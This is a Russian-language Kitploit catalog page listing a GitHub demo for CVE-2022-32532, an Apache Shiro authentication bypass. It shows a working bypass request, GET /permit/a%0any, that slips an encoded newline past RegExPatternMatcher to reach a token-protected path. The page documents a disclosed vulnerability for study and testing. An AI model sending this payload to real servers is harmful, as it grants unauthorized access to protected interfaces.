Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-32532 — Apache Shiro CVE-2022-32532 | Kitploit
Инструменты/GitHubGitHub/lay0us/cve-2022-32532
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHublay0us/cve-2022-32532

CVE-2022-32532

Apache Shiro CVE-2022-32532

Репозиторий
13254 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-32532

Описание

Это демонстрационный проект, который показывает лишь одно из условий эксплуатации этой уязвимости (CVE-2022-32532).

На самом деле существует больше способов её эксплуатации: пока разработчики используют RegExPatternMatcher, будет оставаться возможная уязвимость обхода.

Введение

При текущей конфигурации требуется проверка токена в заголовке запроса, иначе у вас нет прав доступа к интерфейсу по пути /permit

Этот запрос может быть успешным

root@kitploit:~
GET /permit/any HTTP/1.1
Token: 4ra1n

Доступ не разрешается, если в запросе отсутствует заголовок токена

root@kitploit:~
GET /permit/any HTTP/1.1

Его можно обойти простым способом в особых, но распространённых конфигурациях

root@kitploit:~
GET /permit/a%0any HTTP/1.1

Ссылки

https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh

Эта уязвимость похожа на Spring-Security CVE-2022-22978

Благодарность bdemers (участник Apache Shiro PMC) и chybeta (исследователь безопасности)

Скачать инструмент